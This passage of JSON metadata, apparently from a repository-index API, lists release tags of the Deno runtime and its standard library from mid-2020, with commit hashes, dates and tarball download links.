ha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denola